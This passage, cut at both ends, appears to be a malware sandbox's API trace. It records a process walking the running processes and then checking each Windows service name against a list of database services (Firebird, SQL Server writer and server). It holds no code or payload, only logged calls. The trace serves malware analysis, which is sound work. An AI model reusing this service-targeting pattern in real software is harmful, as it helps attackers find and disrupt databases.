dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0177.031] lstrlenW (lpString="msoia.exe") returned 9 [0177.031] Process32NextW (in: hSnapshot=0x54c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0177.032] lstrlenW (lpString="taskhostw.exe") returned 13 [0177.032] Process32NextW (in: hSnapshot=0x54c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3f, th32ParentProcessID=0x9c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0177.033] lstrlenW (lpString="explorer.exe") returned 12 [0177.033] Process32NextW (in: hSnapshot=0x54c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0177.034] lstrlenW (lpString="SearchUI.exe") returned 12 [0177.034] Process32NextW (in: hSnapshot=0x54c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0177.035] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0177.035] Process32NextW (in: hSnapshot=0x54c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0177.035] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0177.035] Process32NextW (in: hSnapshot=0x54c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0177.036] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0177.036] Process32NextW (in: hSnapshot=0x54c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x9d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0177.037] lstrlenW (lpString="hgaibc.exe") returned 10 [0177.037] Process32NextW (in: hSnapshot=0x54c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0177.038] lstrlenW (lpString="cmd.exe") returned 7 [0177.038] Process32NextW (in: hSnapshot=0x54c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0177.039] lstrlenW (lpString="conhost.exe") returned 11 [0177.039] Process32NextW (in: hSnapshot=0x54c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0177.040] lstrlenW (lpString="dllhost.exe") returned 11 [0177.040] Process32NextW (in: hSnapshot=0x54c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0177.041] lstrlenW (lpString="dllhost.exe") returned 11 [0177.041] Process32NextW (in: hSnapshot=0x54c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 0 [0177.042] CloseHandle (hObject=0x54c) returned 1 [0177.042] Sleep (dwMilliseconds=0x1f4) [0177.553] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x458c240 [0177.553] EnumServicesStatusExW (in: hSCManager=0x458c240, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0) returned 0 [0177.554] GetLastError () returned 0xea [0177.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c30) returned 0x6fd308 [0177.554] EnumServicesStatusExW (in: hSCManager=0x458c240, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x6fd308, cbBufSize=0x1c30, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x6fd308, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0) returned 1 [0177.554] CloseServiceHandle (hSCObject=0x458c240) returned 1 [0177.555] lstrlenW (lpString="Appinfo") returned 7 [0177.555] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0177.555] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0177.555] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0177.555] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0177.555] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0177.555] lstrlenW (lpString="AppXSvc") returned 7 [0177.555] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0177.555] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0177.555] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0177.555] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0177.555] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0177.555] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0177.555] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0177.555] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0177.555] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0177.555] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0177.555] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0177.555] lstrlenW (lpString="Audiosrv") returned 8 [0177.555] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0177.555] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0177.555] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0177.555] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0177.555] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0177.556] lstrlenW (lpString="BFE") returned 3 [0177.556] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0177.556] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0177.556] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0177.556] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0177.556] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0177.556] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0177.556] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0177.556] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0177.556] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0177.556] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0177.556] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0177.556] lstrlenW (lpString="CDPSvc") returned 6 [0177.556] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0177.556] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0177.556] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0177.556] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0177.556] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0177.556] lstrlenW (lpString="ClickToRunSvc") returned 13 [0177.556] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0177.556] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0177.556] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0177.556] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0177.556] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0177.556] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0177.556] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0177.556] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0177.557] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0177.557] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0177.557] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0177.557] lstrlenW (lpString="CryptSvc") returned 8 [0177.557] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0177.557] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0177.557] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0177.557] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0177.557] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0177.557] lstrlenW (lpString="DcomLaunch") returned 10 [0177.557] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0177.557] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0177.557] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0177.557] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0177.557] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0177.557] lstrlenW (lpString="DeviceAssociationService") returned 24 [0177.557] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0177.557] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0177.557] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0177.557] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0177.557] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0177.557] lstrlenW (lpString="Dhcp") returned 4 [0177.557] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0177.557] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0177.557] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0177.557] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0177.557] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0177.557] lstrlenW (lpString="Dnscache") returned 8 [0177.558] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0177.558] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0177.558] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0177.558] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0177.558] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0177.558] lstrlenW (lpString="DPS") returned 3 [0177.558] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0177.558] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0177.558] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0177.558] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0177.558] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0177.558] lstrlenW (lpString="DusmSvc") returned 7 [0177.558] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0177.558] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0177.558] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0177.558] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0177.558] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0177.558] lstrlenW (lpString="EventLog") returned 8 [0177.558] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0177.558] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0177.558] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0177.558] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0177.558] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0177.558] lstrlenW (lpString="EventSystem") returned 11 [0177.558] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0177.558] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0177.558] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0177.558] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0177.559] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0177.559] lstrlenW (lpString="FontCache") returned 9 [0177.559] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0177.559] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0177.559] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0177.559] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0177.559] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0177.559] lstrlenW (lpString="gpsvc") returned 5 [0177.559] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0177.559] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0177.559] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0177.559] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0177.559] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0177.559] lstrlenW (lpString="iphlpsvc") returned 8 [0177.559] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0177.559] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0177.559] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0177.559] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0177.559] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0177.559] lstrlenW (lpString="KeyIso") returned 6 [0177.559] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0177.559] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0177.559] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0177.559] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0177.559] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0177.559] lstrlenW (lpString="LanmanServer") returned 12 [0177.559] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0177.560] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0177.560] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0177.560] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0177.560] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0177.560] lstrlenW (lpString="LanmanWorkstation") returned 17 [0177.560] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0177.560] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0177.560] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0177.560] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0177.560] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0177.560] lstrlenW (lpString="lfsvc") returned 5 [0177.560] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0177.560] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0177.560] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0177.560] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0177.560] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0177.560] lstrlenW (lpString="lmhosts") returned 7 [0177.560] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0177.560] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0177.560] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0177.560] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0177.560] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0177.560] lstrlenW (lpString="LSM") returned 3 [0177.560] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0177.560] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0177.560] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0177.560] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0177.561] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0177.561] lstrlenW (lpString="MpsSvc") returned 6 [0177.561] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0177.561] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0177.561] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0177.561] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0177.561] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0177.561] lstrlenW (lpString="NcbService") returned 10 [0177.561] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0177.561] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0177.561] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0177.561] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0177.561] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0177.561] lstrlenW (lpString="netprofm") returned 8 [0177.561] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0177.561] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0177.561] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0177.561] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0177.561] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0177.561] lstrlenW (lpString="NgcSvc") returned 6 [0177.561] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0177.561] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0177.561] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0177.561] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0177.561] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0177.561] lstrlenW (lpString="NlaSvc") returned 6 [0177.561] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0177.561] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0177.561] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0177.561] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0177.561] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0177.562] lstrlenW (lpString="nsi") returned 3 [0177.562] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0177.562] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0177.562] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0177.562] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0177.562] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0177.562] lstrlenW (lpString="PcaSvc") returned 6 [0177.562] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0177.562] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0177.562] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0177.562] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0177.562] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0177.562] lstrlenW (lpString="PlugPlay") returned 8 [0177.562] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0177.562] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0177.562] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0177.562] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0177.562] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0177.562] lstrlenW (lpString="Power") returned 5 [0177.562] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0177.562] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0177.562] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0177.562] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0177.562] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0177.562] lstrlenW (lpString="ProfSvc") returned 7 [0177.562] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0177.562] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0177.562] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0177.562] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0177.562] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0177.562] lstrlenW (lpString="RpcEptMapper") returned 12 [0177.563] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0177.563] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0177.563] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0177.563] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0177.563] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0177.563] lstrlenW (lpString="RpcSs") returned 5 [0177.563] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0177.563] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0177.563] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0177.563] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0177.563] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0177.563] lstrlenW (lpString="SamSs") returned 5 [0177.563] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0177.563] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0177.563] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0177.563] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0177.563] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0177.563] lstrlenW (lpString="Schedule") returned 8 [0177.563] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0177.563] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0177.563] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0177.563] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0177.563] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0177.563] lstrlenW (lpString="SecurityHealthService") returned 21 [0177.563] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0177.563] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0177.563] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0177.564] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0177.564] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0177.564] lstrlenW (lpString="SENS") returned 4 [0177.564] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0177.564] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0177.564] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0177.564] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0177.564] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0177.564] lstrlenW (lpString="ShellHWDetection") returned 16 [0177.564] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0177.564] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0177.564] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0177.564] lstrcmpiW 